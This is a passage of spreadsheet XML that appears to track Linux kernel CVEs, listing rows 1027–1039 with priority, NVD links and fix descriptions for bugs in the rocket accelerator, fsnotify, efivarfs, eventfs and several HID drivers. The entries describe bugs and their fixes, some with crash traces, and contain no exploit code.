        </is>
      </c>
      <c r="S1027" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89589</t>
        </is>
      </c>
    </row>
    <row r="1028">
      <c r="A1028" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1028" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1028" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89590</t>
        </is>
      </c>
      <c r="D1028" s="5" t="inlineStr"/>
      <c r="E1028" s="5" t="inlineStr"/>
      <c r="F1028" s="5" t="inlineStr"/>
      <c r="G1028" s="5" t="inlineStr"/>
      <c r="H1028" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1028" s="5" t="inlineStr"/>
      <c r="J1028" s="5" t="inlineStr"/>
      <c r="K1028" s="5" t="inlineStr"/>
      <c r="L1028" s="5" t="inlineStr"/>
      <c r="M1028" s="5" t="inlineStr"/>
      <c r="N1028" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1028" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1028" s="5" t="inlineStr"/>
      <c r="Q1028" s="5" t="inlineStr"/>
      <c r="R1028" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
accel/rocket: Fix error path handling in rocket_job_run()
In rocket_job_run(), after taking an extra fence reference for
job-&gt;done_fence via dma_fence_get(), the error paths have three bugs:
- The dma_fence reference held by job-&gt;done_fence is never released,
  causing a reference leak.
- pm_runtime_get_sync() increments the usage counter even on failure,
  but the error path does not decrement it, leaking the runtime PM
  reference and preventing the NPU from suspending.
- A valid but unsignaled fence is returned to the DRM scheduler,
  which triggers WARN("Fence ... released with pending signals!")
  when the scheduler drops its reference.
Fix by replacing pm_runtime_get_sync() with pm_runtime_resume_and_get()
which auto-balances the usage counter on failure, releasing both fence
references on error, and returning ERR_PTR(ret) instead of the
unsignaled fence.
[tomeu: Refactored error paths to use consolidated goto labels]</t>
        </is>
      </c>
      <c r="S1028" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89590</t>
        </is>
      </c>
    </row>
    <row r="1029">
      <c r="A1029" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1029" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1029" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89591</t>
        </is>
      </c>
      <c r="D1029" s="5" t="inlineStr"/>
      <c r="E1029" s="5" t="inlineStr"/>
      <c r="F1029" s="5" t="inlineStr"/>
      <c r="G1029" s="5" t="inlineStr"/>
      <c r="H1029" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1029" s="5" t="inlineStr"/>
      <c r="J1029" s="5" t="inlineStr"/>
      <c r="K1029" s="5" t="inlineStr"/>
      <c r="L1029" s="5" t="inlineStr"/>
      <c r="M1029" s="5" t="inlineStr"/>
      <c r="N1029" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1029" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1029" s="5" t="inlineStr"/>
      <c r="Q1029" s="5" t="inlineStr"/>
      <c r="R1029" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
accel/rocket: initialize job domain before cleanup paths
rocket_ioctl_submit_job() releases rjob through rocket_job_put() on
allocation error paths. rocket_job_cleanup() unconditionally calls
rocket_iommu_domain_put(job-&gt;domain), but job-&gt;domain is assigned only
after task copying and BO lookups. A failure before that assignment can
therefore clean up a job with a NULL domain pointer.
Take the per-file domain reference before the first error path can release
rjob. Also clear rjob-&gt;tasks after freeing it in rocket_copy_tasks(), so
the common cleanup path cannot free the task array again after a task-copy
error.</t>
        </is>
      </c>
      <c r="S1029" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89591</t>
        </is>
      </c>
    </row>
    <row r="1030">
      <c r="A1030" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1030" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1030" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89592</t>
        </is>
      </c>
      <c r="D1030" s="5" t="inlineStr"/>
      <c r="E1030" s="5" t="inlineStr"/>
      <c r="F1030" s="5" t="inlineStr"/>
      <c r="G1030" s="5" t="inlineStr"/>
      <c r="H1030" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1030" s="5" t="inlineStr"/>
      <c r="J1030" s="5" t="inlineStr"/>
      <c r="K1030" s="5" t="inlineStr"/>
      <c r="L1030" s="5" t="inlineStr"/>
      <c r="M1030" s="5" t="inlineStr"/>
      <c r="N1030" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1030" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1030" s="5" t="inlineStr"/>
      <c r="Q1030" s="5" t="inlineStr"/>
      <c r="R1030" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
accel/rocket: fix NULL dereference and integer overflow in rocket_job_push()
rocket_job_push() allocates a temporary array to hold all input and
output GEM object pointers:
    bos = kvmalloc_array(job-&gt;in_bo_count + job-&gt;out_bo_count,
                         sizeof(void *), GFP_KERNEL);
    memcpy(bos, job-&gt;in_bos, job-&gt;in_bo_count * sizeof(void *));
    memcpy(&amp;bos[job-&gt;in_bo_count], job-&gt;out_bos, ...);
Two bugs exist:
1. Missing NULL check: if kvmalloc_array() fails, bos is NULL and
   the subsequent memcpy() dereferences it, causing a kernel NULL
   pointer dereference.
2. Integer overflow: in_bo_count and out_bo_count are both u32, set
   directly from userspace-supplied in_bo_handle_count and
   out_bo_handle_count with no prior validation. Their sum is computed
   in u32 arithmetic and can wrap to a smaller value, causing the
   allocation count passed to kvmalloc_array() to be smaller than
   intended. Subsequent uses still operate on the original counts when
   copying and locking objects, which may lead to out-of-bounds accesses
   on the temporary array.
Fix by using check_add_overflow() to detect count overflow before the
allocation, and adding a NULL check on the allocation result.</t>
        </is>
      </c>
      <c r="S1030" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89592</t>
        </is>
      </c>
    </row>
    <row r="1031">
      <c r="A1031" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1031" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1031" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89595</t>
        </is>
      </c>
      <c r="D1031" s="5" t="inlineStr"/>
      <c r="E1031" s="5" t="inlineStr"/>
      <c r="F1031" s="5" t="inlineStr"/>
      <c r="G1031" s="5" t="inlineStr"/>
      <c r="H1031" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1031" s="5" t="inlineStr"/>
      <c r="J1031" s="5" t="inlineStr"/>
      <c r="K1031" s="5" t="inlineStr"/>
      <c r="L1031" s="5" t="inlineStr"/>
      <c r="M1031" s="5" t="inlineStr"/>
      <c r="N1031" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1031" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1031" s="5" t="inlineStr"/>
      <c r="Q1031" s="5" t="inlineStr"/>
      <c r="R1031" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fsnotify: Fix stale object mask after concurrent mark updates
When a mark gets a new event bit, fanotify and inotify may avoid
recalculating the object mask if the cached aggregate already contains that
bit. This is racy with a recalculation triggered by a concurrent update to
another mark on the same connector.
The concurrent scan can read the mark before the new bit is added, while
the updater reads the old aggregate before that scan publishes its result.
The updater then skips recalculation and the scan publishes a mask without
the bit, leaving the object mask stale after both updates complete.
This can be reproduced with two fanotify groups watching the same inode:
one thread removes FAN_MODIFY from one existing mark while another thread
adds FAN_MODIFY to the other mark. After both fanotify_mark() calls return,
writes can fail to produce FAN_MODIFY for the group whose mark now contains
the bit. This was reproduced on an unmodified v6.12.95 kernel. The
equivalent inotify interleaving loses IN_MODIFY events.
For normal fanotify additions, recalculate whenever the raw mark mask
changes. The normal mask is not cleared asynchronously, so an unchanged
addition cannot introduce missing interest. Always recalculate ignore-mask
updates because FS_MODIFY handling may clear the ignore mask without taking
mark-&gt;lock, making snapshot comparisons unreliable.
Always recalculate after updating an existing inotify watch. Its replace
path temporarily sets mark-&gt;mask to zero, so a concurrent scan can observe
zero even when the old and final masks are equal. Assigning the replacement
mask directly would avoid the transient zero, but existing-watch updates
are infrequent, so unconditional recalculation is simpler.</t>
        </is>
      </c>
      <c r="S1031" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89595</t>
        </is>
      </c>
    </row>
    <row r="1032">
      <c r="A1032" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1032" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1032" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89598</t>
        </is>
      </c>
      <c r="D1032" s="5" t="inlineStr"/>
      <c r="E1032" s="5" t="inlineStr"/>
      <c r="F1032" s="5" t="inlineStr"/>
      <c r="G1032" s="5" t="inlineStr"/>
      <c r="H1032" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1032" s="5" t="inlineStr"/>
      <c r="J1032" s="5" t="inlineStr"/>
      <c r="K1032" s="5" t="inlineStr"/>
      <c r="L1032" s="5" t="inlineStr"/>
      <c r="M1032" s="5" t="inlineStr"/>
      <c r="N1032" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1032" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1032" s="5" t="inlineStr"/>
      <c r="Q1032" s="5" t="inlineStr"/>
      <c r="R1032" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fbdev: ssd1307fb: defer I2C transfers from damage callbacks
The fbdev damage callbacks may run from fbcon while printk has disabled
preemption.  They currently update the display synchronously, which enters
the sleeping I2C transfer path from atomic context.
A complete report from an RK3566 system follows:
  [  258.129004] watchdog: watchdog0: watchdog did not stop!
  [  258.129067] BUG: scheduling while atomic: systemd/1/0x00000003
  [  258.129076] Modules linked in: algif_hash algif_skcipher af_alg bnep
  binfmt_misc lz4hc lz4 zram snd_soc_hdmi_codec brcmfmac_wcc hci_uart
  fb_ssd1306(C) fbtft(C) btqca btrtl btintel btsdio snd_soc_simple_card
  motorcomm pwm_fan snd_soc_simple_card_utils ssd130x_spi nls_iso8859_1
  ssd130x btbcm drm_shmem_helper display_connector brcmfmac ssd1307fb
  brcmutil bluetooth cfg80211 rfkill snd_soc_rockchip_i2s_tdm
  snd_soc_rk817 hantro_vpu snd_soc_core snd_compress snd_pcm_dmaengine
  v4l2_vp9 snd_pcm v4l2_h264 rockchip_rga snd_timer rk_crypto2
  spi_rockchip_sfc videobuf2_dma_contig snd sm3_generic v4l2_mem2mem
  videobuf2_dma_sg dwmac_rk sm3 soundcore videobuf2_memops videobuf2_v4l2
  stmmac_platform dw_hdmi_cec videodev videobuf2_common dw_hdmi_i2s_audio
  stmmac rk817_charger pcs_xpcs mc cpufreq_dt sch_fq_codel ip_tables
  x_tables autofs4
  [  258.129215] Preemption disabled at:
  [  258.129216] [&lt;ffff80008012f96c&gt;] vprintk_emit+0x11c/0x340
  [  258.129234] CPU: 0 PID: 1 Comm: systemd Tainted: G         C
  6.6.0-rc5-rockchip-rk356x #4
  [  258.129239] Hardware name: Rockchip RK3566 OPi 3B (DT)
  [  258.129243] Call trace:
  [  258.129245]  dump_backtrace+0xa0/0x128
  [  258.129252]  show_stack+0x20/0x38
  [  258.129256]  dump_stack_lvl+0x60/0xb0
  [  258.129265]  dump_stack+0x18/0x28
  [  258.129269]  __schedule_bug+0xa0/0xc8
  [  258.129274]  __schedule+0x9ac/0xd30
  [  258.129279]  schedule+0x60/0x100
  [  258.129282]  schedule_timeout+0x194/0x338
  [  258.129289]  rk3x_i2c_xfer_common.isra.0+0x384/0x498
  [  258.129296]  rk3x_i2c_xfer+0x20/0x60
  [  258.129300]  __i2c_transfer+0x194/0x648
  [  258.129308]  i2c_transfer+0x9c/0x130
  [  258.129313]  i2c_transfer_buffer_flags+0x64/0x98
  [  258.129318]  ssd1307fb_update_rect+0x42c/0x560 [ssd1307fb]
  [  258.129334]  ssd1307fb_defio_imageblit+0x34/0x50 [ssd1307fb]
  [  258.129343]  soft_cursor+0x13c/0x210
  [  258.129350]  bit_cursor+0x2dc/0x550
  [  258.129354]  fbcon_cursor+0xec/0x108
  [  258.129359]  hide_cursor+0x44/0xc8
  [  258.129365]  vt_console_print+0x398/0x3b0
  [  258.129370]  console_flush_all.isra.0+0x17c/0x410
  [  258.129377]  console_unlock+0x4c/0x100
  [  258.129382]  vprintk_emit+0x1c8/0x340
  [  258.129386]  vprintk_default+0x40/0x58
  [  258.129389]  vprintk+0xb8/0xd0
  [  258.129392]  _printk+0x68/0x98
  [  258.129398]  watchdog_release+0x170/0x230
  [  258.129404]  __fput+0xbc/0x288
  [  258.129409]  __fput_sync+0x58/0x70
  [  258.129413]  __arm64_sys_close+0x40/0x90
  [  258.129419]  invoke_syscall+0x4c/0x118
  [  258.129426]  el0_svc_common.constprop.0+0x48/0xf0
  [  258.129432]  do_el0_svc+0x24/0x38
  [  258.129437]  el0_svc+0x48/0x100
  [  258.129443]  el0t_64_sync_handler+0xc0/0xc8
  [  258.129448]  el0t_64_sync+0x190/0x198
  [  258.573087] ------------[ cut here ]------------
  [  258.573098] DEBUG_LOCKS_WARN_ON(val &gt; preempt_count())
  [  258.573111] WARNING: CPU: 0 PID: 1 at kernel/sched/core.c:5871
  preempt_count_sub+0x9c/0x148
  [  258.573130] Modules linked in: algif_hash algif_skcipher af_alg bnep
  binfmt_misc lz4hc lz4 zram snd_soc_hdmi_codec brcmfmac_wcc hci_uart
  fb_ssd1306(C) fbtft(C) btqca btrtl btintel btsdio snd_soc_simple_card
  motorcomm pwm_fan snd_soc_simple_card_utils ssd130x_spi nls_iso8859_1
  ssd130x btbcm drm_shmem_helper display_connector brcmfmac ssd1307fb
  brcmutil bluetooth cfg80211 rfkill snd_soc_rockchip_i2s_tdm
  snd_soc_rk817 hantro_vpu snd_soc_core snd_compress snd_pcm_dmaengine
  v4l2_vp
---truncated---</t>
        </is>
      </c>
      <c r="S1032" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89598</t>
        </is>
      </c>
    </row>
    <row r="1033">
      <c r="A1033" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1033" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1033" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89604</t>
        </is>
      </c>
      <c r="D1033" s="5" t="inlineStr"/>
      <c r="E1033" s="5" t="inlineStr"/>
      <c r="F1033" s="5" t="inlineStr"/>
      <c r="G1033" s="5" t="inlineStr"/>
      <c r="H1033" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1033" s="5" t="inlineStr"/>
      <c r="J1033" s="5" t="inlineStr"/>
      <c r="K1033" s="5" t="inlineStr"/>
      <c r="L1033" s="5" t="inlineStr"/>
      <c r="M1033" s="5" t="inlineStr"/>
      <c r="N1033" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1033" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1033" s="5" t="inlineStr"/>
      <c r="Q1033" s="5" t="inlineStr"/>
      <c r="R1033" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
efivarfs: Rate limit statfs() handler
Ravi reports that statfs() may be called by unprivileged users on the
efivarfs mount point, which may result in a flood of calls to the
QueryVariableInfo() runtime service. These calls are disproportionately
costly on x86 systems where the variable store is backed by SMM, as each
SMM entry requires a rendez-vous of all the CPUs.
So rate limit the calls to QueryVariableInfo() at twice per second, and
return the most recently obtained value for calls that are elided.</t>
        </is>
      </c>
      <c r="S1033" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89604</t>
        </is>
      </c>
    </row>
    <row r="1034">
      <c r="A1034" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1034" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1034" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89618</t>
        </is>
      </c>
      <c r="D1034" s="5" t="inlineStr"/>
      <c r="E1034" s="5" t="inlineStr"/>
      <c r="F1034" s="5" t="inlineStr"/>
      <c r="G1034" s="5" t="inlineStr"/>
      <c r="H1034" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1034" s="5" t="inlineStr"/>
      <c r="J1034" s="5" t="inlineStr"/>
      <c r="K1034" s="5" t="inlineStr"/>
      <c r="L1034" s="5" t="inlineStr"/>
      <c r="M1034" s="5" t="inlineStr"/>
      <c r="N1034" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1034" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1034" s="5" t="inlineStr"/>
      <c r="Q1034" s="5" t="inlineStr"/>
      <c r="R1034" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
eventfs: Initialize ei-&gt;children and ei-&gt;list in init_ei()
eventfs_create_dir() allocates the eventfs_inode and initializes it with
init_ei(). But this does not initialize the eventfs_inode list_heads. If
the eventfs_create_dir() fails due to memory pressure, it will call
free_ei() before it initialized the lists, and that checks to make sure
the eventfs_inode has no children. But because the list wasn't
initialized, it will give a false warning.
Fix it by moving the list initialization into init_ei().
[ Rewrote change log ]</t>
        </is>
      </c>
      <c r="S1034" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89618</t>
        </is>
      </c>
    </row>
    <row r="1035">
      <c r="A1035" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1035" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1035" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89621</t>
        </is>
      </c>
      <c r="D1035" s="5" t="inlineStr"/>
      <c r="E1035" s="5" t="inlineStr"/>
      <c r="F1035" s="5" t="inlineStr"/>
      <c r="G1035" s="5" t="inlineStr"/>
      <c r="H1035" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1035" s="5" t="inlineStr"/>
      <c r="J1035" s="5" t="inlineStr"/>
      <c r="K1035" s="5" t="inlineStr"/>
      <c r="L1035" s="5" t="inlineStr"/>
      <c r="M1035" s="5" t="inlineStr"/>
      <c r="N1035" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1035" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1035" s="5" t="inlineStr"/>
      <c r="Q1035" s="5" t="inlineStr"/>
      <c r="R1035" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
HID: mcp2221: validate report size in mcp2221_raw_event()
mcp2221_raw_event() never validates the size of incoming HID reports.
In the MCP2221_I2C_GET_DATA path it trusts the device-supplied data[3]
as the copy length without checking that 4 + data[3] bytes actually
exist in the received report. A malicious or misbehaving USB device can
send a short report with a large data[3], causing the memcpy to read
past the valid report data in the HID transfer buffer and leak
uninitialized kernel memory back to userspace through the I2C/SMBus
read path.
Add a minimum size check at entry and validate that the source range
fits within the received report before the copy.</t>
        </is>
      </c>
      <c r="S1035" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89621</t>
        </is>
      </c>
    </row>
    <row r="1036">
      <c r="A1036" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1036" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1036" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89623</t>
        </is>
      </c>
      <c r="D1036" s="5" t="inlineStr"/>
      <c r="E1036" s="5" t="inlineStr"/>
      <c r="F1036" s="5" t="inlineStr"/>
      <c r="G1036" s="5" t="inlineStr"/>
      <c r="H1036" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1036" s="5" t="inlineStr"/>
      <c r="J1036" s="5" t="inlineStr"/>
      <c r="K1036" s="5" t="inlineStr"/>
      <c r="L1036" s="5" t="inlineStr"/>
      <c r="M1036" s="5" t="inlineStr"/>
      <c r="N1036" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1036" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1036" s="5" t="inlineStr"/>
      <c r="Q1036" s="5" t="inlineStr"/>
      <c r="R1036" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
HID: mcp2221: stop device IO before hid_hw_stop
Quiesce device IO at the start of the devm cleanup callback
mcp2221_hid_unregister() so that incoming HID reports cannot race with
hardware teardown during probe failure or device removal, addressing a
potential use-after-free.
Guard the call to hid_device_io_stop() with io_started. On normal
removal hid_device_remove() has already cleared io_started before the
devres group is released, so an unconditional call would otherwise hit
the !io_started path and emit a spurious "io already stopped" warning
on every removal. The guard preserves the probe-failure balancing,
where io_started is still set after hid_device_io_start(), while
staying silent on the normal removal path.</t>
        </is>
      </c>
      <c r="S1036" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89623</t>
        </is>
      </c>
    </row>
    <row r="1037">
      <c r="A1037" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1037" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1037" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89625</t>
        </is>
      </c>
      <c r="D1037" s="5" t="inlineStr"/>
      <c r="E1037" s="5" t="inlineStr"/>
      <c r="F1037" s="5" t="inlineStr"/>
      <c r="G1037" s="5" t="inlineStr"/>
      <c r="H1037" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1037" s="5" t="inlineStr"/>
      <c r="J1037" s="5" t="inlineStr"/>
      <c r="K1037" s="5" t="inlineStr"/>
      <c r="L1037" s="5" t="inlineStr"/>
      <c r="M1037" s="5" t="inlineStr"/>
      <c r="N1037" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1037" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1037" s="5" t="inlineStr"/>
      <c r="Q1037" s="5" t="inlineStr"/>
      <c r="R1037" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
HID: sony: fix UAF of ghl_poke_timer / ghl_urb at driver unbind
For GHL (Guitar Hero Live) dongles, sony_probe() arms a periodic timer:
ghl_magic_poke() (the timer callback) submits sc-&gt;ghl_urb, and the URB
completion ghl_magic_poke_cb() re-arms the timer with mod_timer().
sony_remove() drained the timer with timer_delete_sync() and then freed
the URB with usb_free_urb():
	timer_delete_sync(&amp;sc-&gt;ghl_poke_timer);
	usb_free_urb(sc-&gt;ghl_urb);
timer_delete_sync() does not block re-arming, and while the URB is in
flight the timer is not pending, so the sync delete is a no-op. A URB
completion that runs after the delete re-arms the timer, and usb_free_urb()
only drops a reference -- it does not kill an in-flight URB. sc is
allocated with devm_kzalloc() and freed once sony_remove() returns, so the
re-armed ghl_poke_timer (embedded in sc) then fires on freed memory, a
use-after-free from timer softirq. This is a disconnect/rmmod race.
Poison the URB first, then shut the timer down, before freeing the URB.
usb_poison_urb() kills any in-flight URB and permanently rejects further
submissions, so a poke timer that is still pending cannot re-submit the
URB from ghl_magic_poke() in the window before timer_shutdown_sync() runs.
usb_kill_urb() would not suffice: it only cancels the in-flight URB and
leaves it submittable once it returns, so the pending timer could
re-submit it and put a fresh URB in flight over the freed sc.
timer_shutdown_sync() then drains any last callback and blocks re-arming.
The probe error path is unaffected: it is only reached before the timer
is armed.
Reproduced under KASAN on next-20260710 via dummy_hcd + raw-gadget
emulation of the GHL PS4 dongle (VID 0x1430 / PID 0x07bb): hid-sony binds
and arms the poke timer, the poke URB is held in flight, the driver is
unbound (freeing sc), then the URB is released. The completion re-arms the
timer on the freed sc, and the re-armed timer fires ~8 s later:
  BUG: KASAN: slab-use-after-free in ghl_magic_poke+0x98/0xb0
  Read of size 8 at addr ffff88810b02fd50 by task swapper/0/0
   ghl_magic_poke+0x98/0xb0
   call_timer_fn+0x35/0x2b0
   __run_timers+0x69c/0x9a0
   run_timer_softirq+0x173/0x2a0
  Allocated by task 169:  sony_probe
  Freed by task 338:      devres_release_group &lt;- hid_device_remove (sony_remove)
Found by 0sec (https://0sec.ai) using automated source analysis.</t>
        </is>
      </c>
      <c r="S1037" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89625</t>
        </is>
      </c>
    </row>
    <row r="1038">
      <c r="A1038" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1038" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1038" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89627</t>
        </is>
      </c>
      <c r="D1038" s="5" t="inlineStr"/>
      <c r="E1038" s="5" t="inlineStr"/>
      <c r="F1038" s="5" t="inlineStr"/>
      <c r="G1038" s="5" t="inlineStr"/>
      <c r="H1038" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1038" s="5" t="inlineStr"/>
      <c r="J1038" s="5" t="inlineStr"/>
      <c r="K1038" s="5" t="inlineStr"/>
      <c r="L1038" s="5" t="inlineStr"/>
      <c r="M1038" s="5" t="inlineStr"/>
      <c r="N1038" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1038" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1038" s="5" t="inlineStr"/>
      <c r="Q1038" s="5" t="inlineStr"/>
      <c r="R1038" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
HID: roccat: free buffered reports when destroying device
roccat_report_event() duplicates each report with kmemdup() and stores
the allocation in a circular-buffer slot. The allocation is released only
when that slot is reused.
The device destruction paths free struct roccat_device without releasing
reports still stored in cbuf[]. This makes those allocations unreachable
and leaks up to ROCCAT_CBUF_SIZE report buffers per device.
Add a small destructor that frees every buffered report before freeing the
device, and use it in both paths that can destroy a registered device.</t>
        </is>
      </c>
      <c r="S1038" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89627</t>
        </is>
      </c>
    </row>
    <row r="1039">
      <c r="A1039" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1039" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1039" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89628</t>
        </is>
      </c>
      <c r="D1039" s="5" t="inlineStr"/>
      <c r="E1039" s="5" t="inlineStr"/>
      <c r="F1039" s="5" t="inlineStr"/>
      <c r="G1039" s="5" t="inlineStr"/>
      <c r="H1039" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1039" s="5" t="inlineStr"/>
      <c r="J1039" s="5" t="inlineStr"/>
      <c r="K1039" s="5" t="inlineStr"/>
      <c r="L1039" s="5" t="inlineStr"/>
      <c r="M1039" s="5" t="inlineStr"/>
      <c r="N1039" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1039" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1039" s="5" t="inlineStr"/>
      <c r="Q1039" s="5" t="inlineStr"/>
      <c r="R1039" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
HID: picolcd: clamp eeprom debugfs read to bytes actually received
picolcd_debug_eeprom_read() trusts resp-&gt;raw_data[2] -- a length byte
supplied by the device in its REPORT_EE_DATA reply -- clamped only to
the caller's read() count:
	ret = resp-&gt;raw_data[2];
	if (ret &gt; s)
		ret = s;
	if (copy_to_user(u, resp-&gt;raw_data+3, ret))
It never checks resp-&gt;raw_size, the number of bytes picolcd_raw_event()
actually copied into the 64-byte raw_data[] of the kmalloc'd struct
picolcd_pending. A device (or a spoofed picoLCD) returning a length byte
of 0xff, read with a count &gt;= 255, makes copy_to_user() read past
raw_data[] into adjacent slab memory and return it to userspace through
the debugfs "eeprom" file:
	BUG: KASAN: slab-out-of-bounds in _copy_to_user
	Read of size 255 ... picolcd_debug_eeprom_read+0x214/0x2f0 [hid_picolcd]
The debug-dump path in the same file already validates the device length
byte against the received size before trusting it; this read does not.
